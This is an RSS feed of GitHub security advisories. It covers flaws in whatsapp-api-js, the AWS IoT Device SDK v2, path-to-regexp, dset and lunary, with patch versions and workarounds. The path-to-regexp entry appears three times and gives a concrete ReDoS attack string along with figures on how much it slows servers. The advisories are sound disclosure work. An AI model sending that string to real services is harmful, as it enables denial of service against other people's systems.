<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:32:37 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[whatsapp-api-js] whatsapp-api-js fails to validate message's signature</title>
<description><h3 id="impact">Impact</h3>
<p>Incorrect Access Control, anyone using the post or verifyRequestSignature methods to handle messages is impacted.</p>
<h3 id="patches">Patches</h3>
<p>Patched in version 4.0.3.</p>
<h3 id="workarounds">Workarounds</h3>
<p>It's possible to check the payload validation using the WhatsAppAPI.verifyRequestSignature and expect false when the signature is valid.</p>
<pre><code class="language-ts">function doPost(payload, header_signature) {
if (whatsapp.verifyRequestSignature(payload.toString(), header_signature)) {
throw 403;
}
// Now the payload is correctly verified
whatsapp.post(payload);
}
</code></pre>
<h3 id="references">References</h3>
<p><a href="https://github.com/Secreto31126/whatsapp-api-js/pull/371">https://github.com/Secreto31126/whatsapp-api-js/pull/371</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/security/advisories/GHSA-mwhf-vhr5-7j23">https://github.com/Secreto31126/whatsapp-api-js/security/advisories/GHSA-mwhf-vhr5-7j23</a></li>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/pull/371">https://github.com/Secreto31126/whatsapp-api-js/pull/371</a></li>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/commit/56620c65126427496a94d176082fbd8393a95b6d">https://github.com/Secreto31126/whatsapp-api-js/commit/56620c65126427496a94d176082fbd8393a95b6d</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45607">https://nvd.nist.gov/vuln/detail/CVE-2024-45607</a></li>
<li><a href="https://github.com/advisories/GHSA-mwhf-vhr5-7j23">https://github.com/advisories/GHSA-mwhf-vhr5-7j23</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mwhf-vhr5-7j23</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mwhf-vhr5-7j23</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.3.3), Python (versions prior to 1.5.18), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.1) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on Windows. This issue has been addressed in aws-c-io submodule versions 0.9.13 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.3.3 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.5.18 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Microsoft Windows.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40828">https://nvd.nist.gov/vuln/detail/CVE-2021-40828</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-94jq-q5v2-76wj">https://github.com/advisories/GHSA-94jq-q5v2-76wj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-94jq-q5v2-76wj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-94jq-q5v2-76wj</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40830">https://nvd.nist.gov/vuln/detail/CVE-2021-40830</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-c4rh-4376-gff4">https://github.com/advisories/GHSA-c4rh-4376-gff4</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c4rh-4376-gff4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c4rh-4376-gff4</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on macOS systems. Additionally, SNI validation is also not enabled when the CA has been "overridden". TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The <code>aws_tls_ctx_options_override_default_trust_store_*</code> function within the aws-c-io submodule has been updated to address this behavior. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.7.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.14.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.6.0 on macOS. Amazon Web Services AWS-C-IO 0.10.7 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40831">https://nvd.nist.gov/vuln/detail/CVE-2021-40831</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-j3f7-7rmc-6wqj">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.4.2), Python (versions prior to 1.6.1), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.3) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on MacOS. This issue has been addressed in aws-c-io submodule versions 0.10.5 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.4.2 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on macOS. Amazon Web Services AWS-C-IO 0.10.4 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40829">https://nvd.nist.gov/vuln/detail/CVE-2021-40829</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2">https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-743r-5g92-5vgf">https://github.com/advisories/GHSA-743r-5g92-5vgf</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-743r-5g92-5vgf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-743r-5g92-5vgf</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[dset] dset Prototype Pollution vulnerability</title>
<description><p>Versions of the package dset before 3.1.4 are vulnerable to Prototype Pollution via the dset function due to improper user input sanitization. This vulnerability allows the attacker to inject malicious object property using the built-in Object property <code>__proto__</code>, which is recursively assigned to all the objects in the program.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21529">https://nvd.nist.gov/vuln/detail/CVE-2024-21529</a></li>
<li><a href="https://github.com/lukeed/dset/commit/16d6154e085bef01e99f01330e5a421a7f098afa">https://github.com/lukeed/dset/commit/16d6154e085bef01e99f01330e5a421a7f098afa</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-JS-DSET-7116691">https://security.snyk.io/vuln/SNYK-JS-DSET-7116691</a></li>
<li><a href="https://github.com/advisories/GHSA-f6v4-cf5j-vf3w">https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</guid>
<author>GitHub</author>
</item>
<item>
<title>[lunary] lunary-ai/lunary Access Control Vulnerability in Prompt Variation Management</title>
<description><p>In lunary-ai/lunary version 1.2.13, an insufficient granularity of access control vulnerability allows users to create, update, get, and delete prompt variations for datasets not owned by their organization. This issue arises due to the application not properly validating the ownership of dataset prompts and their variations against the organization or project of the requesting user. As a result, unauthorized modifications to dataset prompts can occur, leading to altered or removed dataset prompts without proper authorization. This vulnerability impacts the integrity and consistency of dataset information, potentially affecting the results of experiments.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-5389">https://nvd.nist.gov/vuln/detail/CVE-2024-5389</a></li>
<li><a href="https://huntr.com/bounties/3ca5309f-5615-4d5b-8043-968af220d7a2">https://huntr.com/bounties/3ca5309f-5615-4d5b-8043-968af220d7a2</a></li>
<li><a href="https://github.com/lunary-ai/lunary/commit/35dd4af0001a54ccb14276a1546eb977f82c0c5e">https://github.com/lunary-ai/lunary/commit/35dd4af0001a54ccb14276a1546eb977f82c0c5e</a></li>
<li><a href="https://github.com/advisories/GHSA-3mwc-2cj7-gx8c">https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> can enable <code>strict: true</code> and get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
